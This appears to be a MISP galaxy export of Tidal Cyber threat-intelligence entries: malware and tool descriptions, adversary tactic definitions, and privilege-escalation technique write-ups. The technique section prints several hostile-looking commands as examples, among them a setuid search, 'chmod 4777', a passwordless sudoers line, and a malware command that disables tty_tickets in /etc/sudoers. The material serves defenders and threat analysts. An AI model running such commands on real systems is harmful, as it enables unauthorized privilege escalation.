Detection: * Sigma: [net_connection_win_wuauclt_network_connection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml) * Sigma: [proc_creation_win_lolbin_wuauclt.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml) * Sigma: [proc_creation_win_wuauclt_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml) * IOC: wuauclt run with a parameter of a DLL path * IOC: Suspicious wuauclt Internet/network connections<sup>[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]</sup>

The tag is: misp-galaxy:software="wuauclt"

OSX.Sofacy - Associated Software

The tag is: misp-galaxy:software="OSX.Sofacy - Associated Software"

XAgentOSX

The tag is: misp-galaxy:software="XAgentOSX"

Xbash

[Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.<sup>[[Unit42 Xbash Sept 2018](https://app.tidalcyber.com/references/21b890f7-82db-4840-a05e-2155b8ddce8c)]</sup>

The tag is: misp-galaxy:software="Xbash"

xCaon

[xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) is an HTTP variant of the [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) malware family that has used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) since at least 2014. [xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.<sup>[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup><sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup>

The tag is: misp-galaxy:software="xCaon"

xCmd

[xCmd](https://app.tidalcyber.com/software/d943d3d9-3a99-464f-94f0-95aa7963d858) is an open source tool that is similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and allows the user to execute applications on remote systems. <sup>[[xCmd](https://app.tidalcyber.com/references/430fc6ef-33c5-4cd8-b785-358e4aae5230)]</sup>

The tag is: misp-galaxy:software="xCmd"

xcopy

xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy command "creates files with the archive attribute set, whether or not this attribute was set in the source file".<sup>[[xcopy Microsoft](/references/05e01751-ebb4-4b09-be89-4e405ab7e7e4)]</sup>

The tag is: misp-galaxy:software="xcopy"

OSX.DubRobber - Associated Software

<sup>[[malwarebyteslabs xcsset dubrobber](https://app.tidalcyber.com/references/11ef576f-1bac-49e3-acba-85d70a42503e)]</sup>

The tag is: misp-galaxy:software="OSX.DubRobber - Associated Software"

XCSSET

[XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.<sup>[[trendmicro xcsset xcode project 2020](https://app.tidalcyber.com/references/0194bb11-8b97-4d61-8ddb-824077edc7db)]</sup>

The tag is: misp-galaxy:software="XCSSET"

XMRig

XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".<sup>[[U.S. CISA Trends June 30 2020](/references/b97e9a02-4cc5-4845-8058-0be4c566cd7c)]</sup>

The tag is: misp-galaxy:software="XMRig"

xpack.exe - Associated Software

The tag is: misp-galaxy:software="xpack.exe - Associated Software"

Xpack

According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Xpack"

Trojan.Shunnael - Associated Software

The tag is: misp-galaxy:software="Trojan.Shunnael - Associated Software"

X-Tunnel - Associated Software

The tag is: misp-galaxy:software="X-Tunnel - Associated Software"

XAPS - Associated Software

The tag is: misp-galaxy:software="XAPS - Associated Software"

XTunnel

[XTunnel](https://app.tidalcyber.com/software/133136f0-7254-4cec-8710-0ab99d5da4e5) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) during the compromise of the Democratic National Committee. <sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup> <sup>[[Invincea XTunnel](https://app.tidalcyber.com/references/43773784-92b8-4722-806c-4b1fc4278bb0)]</sup> <sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:software="XTunnel"

Xwizard.exe - Associated Software

<sup>[[Xwizard.exe - LOLBAS Project](/references/573df5d1-83e7-4437-bdad-604f093b3cfd)]</sup>

The tag is: misp-galaxy:software="Xwizard.exe - Associated Software"

Xwizard

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe

Author: Oddvar Moe

Paths: * C:\Windows\System32\xwizard.exe * C:\Windows\SysWOW64\xwizard.exe

The tag is: misp-galaxy:software="Xwizard"

YAHOYAH

The tag is: misp-galaxy:software="YAHOYAH"

yty

[yty](https://app.tidalcyber.com/software/e0962ff7-5524-4683-9b95-0e4ba07dccb2) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. <sup>[[ASERT Donot March 2018](https://app.tidalcyber.com/references/a1b987cc-7789-411c-9673-3cf6357b207c)]</sup>

The tag is: misp-galaxy:software="yty"

Zekapab - Associated Software

The tag is: misp-galaxy:software="Zekapab - Associated Software"

Zebrocy

[Zebrocy](https://app.tidalcyber.com/software/e317b8a6-1722-4017-be33-717a5a93ef1c) is a Trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. <sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)]</sup><sup>[[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)]</sup><sup>[[CISA Zebrocy Oct 2020](https://app.tidalcyber.com/references/b7518c4d-6c10-43d2-8e57-d354fb8d4a99)]</sup>

The tag is: misp-galaxy:software="Zebrocy"

Zeroaccess

[Zeroaccess](https://app.tidalcyber.com/software/2f52b513-5293-4833-9c4d-b120e7a84341) is a kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. <sup>[[Sophos ZeroAccess](https://app.tidalcyber.com/references/41b51767-62f1-45c2-98cb-47c44c975a58)]</sup>

The tag is: misp-galaxy:software="Zeroaccess"

Zeus Panda

[Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.<sup>[[Talos Zeus Panda Nov 2017](https://app.tidalcyber.com/references/f96711d4-010d-4d7e-8074-31dd1b41c54d)]</sup><sup>[[GDATA Zeus Panda June 2017](https://app.tidalcyber.com/references/2d9a6957-5645-4863-968b-4a3c8736564b)]</sup>

The tag is: misp-galaxy:software="Zeus Panda"

Zipfldr.dll - Associated Software

<sup>[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]</sup>

The tag is: misp-galaxy:software="Zipfldr.dll - Associated Software"

Zipfldr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Compressed Folder library

Author: LOLBAS Team

Paths: * c:\windows\system32\zipfldr.dll * c:\windows\syswow64\zipfldr.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml]([Zipfldr.dll - LOLBAS Project(/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]</sup>

The tag is: misp-galaxy:software="Zipfldr"

ZLib

[ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) since at least 2014. [ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is malware and should not be confused with the legitimate compression library from which its name is derived.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

The tag is: misp-galaxy:software="ZLib"

ZoxPNG - Associated Software

The tag is: misp-galaxy:software="ZoxPNG - Associated Software"

Gresim - Associated Software

The tag is: misp-galaxy:software="Gresim - Associated Software"

ZoxRPC - Associated Software

The tag is: misp-galaxy:software="ZoxRPC - Associated Software"

Zox

The tag is: misp-galaxy:software="Zox"

zwShell

[zwShell](https://app.tidalcyber.com/software/49314d4e-dc04-456f-918e-a3bedfc3192a) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon]([McAfee Night Dragon(https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]</sup>

The tag is: misp-galaxy:software="zwShell"

Sensocode - Associated Software

The tag is: misp-galaxy:software="Sensocode - Associated Software"

ZxShell

[ZxShell](https://app.tidalcyber.com/software/eea89ff2-036d-4fa6-bbed-f89502c62318) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.<sup>[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)]</sup><sup>[[Talos ZxShell Oct 2014](https://app.tidalcyber.com/references/41c20013-71b3-4957-98f0-fb919014c93e)]</sup>

The tag is: misp-galaxy:software="ZxShell"

ZxxZ

[ZxxZ](https://app.tidalcyber.com/software/91e1ee26-d6ae-4203-a466-93c9e5019b47) is a trojan written in Visual C++ that has been used by [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) since at least August 2021, including against Bangladeshi government personnel.<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup>

The tag is: misp-galaxy:software="ZxxZ"

Tidal Tactic

Tidal Tactic Cluster.

Tidal Tactic is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

Reconnaissance

The adversary is trying to gather information they can use to plan future operations.

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.

The tag is: misp-galaxy:tactic="Reconnaissance"

Resource Development

The adversary is trying to establish resources they can use to support operations.

Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.

The tag is: misp-galaxy:tactic="Resource Development"

Initial Access

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

The tag is: misp-galaxy:tactic="Initial Access"

Execution

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

The tag is: misp-galaxy:tactic="Execution"

Persistence

The adversary is trying to maintain their foothold.

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

The tag is: misp-galaxy:tactic="Persistence"

Privilege Escalation

The adversary is trying to gain higher-level permissions.

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:

  • SYSTEM/root level

  • local administrator

  • user account with admin-like access

  • user accounts with access to specific system or perform specific function

These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.

The tag is: misp-galaxy:tactic="Privilege Escalation"

Defense Evasion

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

The tag is: misp-galaxy:tactic="Defense Evasion"

Credential Access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

The tag is: misp-galaxy:tactic="Credential Access"

Discovery

The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:tactic="Discovery"

Lateral Movement

The adversary is trying to move through your environment.

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.

The tag is: misp-galaxy:tactic="Lateral Movement"

Collection

The adversary is trying to gather data of interest to their goal.

Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary’s objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.

The tag is: misp-galaxy:tactic="Collection"

Command and Control

The adversary is trying to communicate with compromised systems to control them.

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:tactic="Command and Control"

Exfiltration

The adversary is trying to steal data.

Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

The tag is: misp-galaxy:tactic="Exfiltration"

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data.

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.

The tag is: misp-galaxy:tactic="Impact"

Tidal Technique

Tidal Technique Cluster.

Tidal Technique is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

Bypass User Account Control

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.<sup>[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]</sup>

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) objects without prompting the user through the UAC notification box.<sup>[[TechNet Inside UAC](https://app.tidalcyber.com/references/dea47af6-677a-4625-8664-adf0e6839c9f)]</sup><sup>[[MSDN COM Elevation](https://app.tidalcyber.com/references/898df7c7-4f19-40cb-a216-7b0f6c6155b3)]</sup> An example of this is use of [Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.<sup>[[Davidson Windows](https://app.tidalcyber.com/references/49af01f2-06c5-4b21-9882-901ad828ee28)]</sup>

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods<sup>[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]</sup> that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.<sup>[[SANS UAC Bypass](https://app.tidalcyber.com/references/824739ac-633a-40e0-bb01-2bfd43714d67)]</sup>

The tag is: misp-galaxy:technique="Bypass User Account Control"

Elevated Execution with Prompt

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.<sup>[[AppleDocs AuthorizationExecuteWithPrivileges](https://app.tidalcyber.com/references/7b8875e8-5b93-4d49-a12b-2683bab2ba6e)]</sup> The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup><sup>[[OSX Coldroot RAT](https://app.tidalcyber.com/references/5ee3a92c-df33-4ecd-b21e-7b9a4f6de227)]</sup> This technique may be combined with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to trick the user into granting escalated privileges to malicious code.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup> This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup>

The tag is: misp-galaxy:technique="Elevated Execution with Prompt"

Setuid and Setgid

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.<sup>[[setuid man page](https://app.tidalcyber.com/references/c07e9d6c-18f2-4246-a265-9bec7d833bba)]</sup> Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://app.tidalcyber.com/technique/5c6687f6-3539-4268-a6a4-2b98fdeac0fb)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.

Adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future.<sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.<sup>[[GTFOBins Suid](https://app.tidalcyber.com/references/0b7d8e81-da8e-4f6a-a1b7-4ed81e441b4d)]</sup>

The tag is: misp-galaxy:technique="Setuid and Setgid"

Sudo and Sudo Caching

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."<sup>[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)]</sup> Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user’s password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code>.<sup>[[cybereason osx proton](https://app.tidalcyber.com/references/9c43d646-9ac2-43b5-80b6-9e69dcb57617)]</sup> In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

The tag is: misp-galaxy:technique="Sudo and Sudo Caching"

Temporary Elevated Cloud Access

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.<sup>[[Google Cloud Just in Time Access 2023](https://app.tidalcyber.com/references/797c6051-9dff-531b-8438-d306bdf46720)]</sup><sup>[[Azure Just in Time Access 2023](https://app.tidalcyber.com/references/ee35e13f-ca39-5faf-81ae-230d33329a28)]</sup>

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.<sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup> In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.<sup>[[Microsoft Impersonation and EWS in Exchange](https://app.tidalcyber.com/references/d7755dbd-0b38-5776-b63a-d792a4d027a4)]</sup>

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role’s access — for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.<sup>[[AWS PassRole](https://app.tidalcyber.com/references/01e0c198-dd59-5dd1-b632-73cb316eafe0)]</sup><sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup>

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.<sup>[[Rhino Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/55173e12-9edc-5685-ac0b-acd51617cc6e)]</sup><sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>

Note: this technique is distinct from [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.<sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:technique="Temporary Elevated Cloud Access"

Abuse Elevation Control Mechanism

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:technique="Abuse Elevation Control Mechanism"

Create Process with Token

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.<sup>[[Microsoft RunAs](https://app.tidalcyber.com/references/af05c12e-f9c6-421a-9a5d-0797c01ab2dc)]</sup>

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) or created via [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) before being used to create a process.

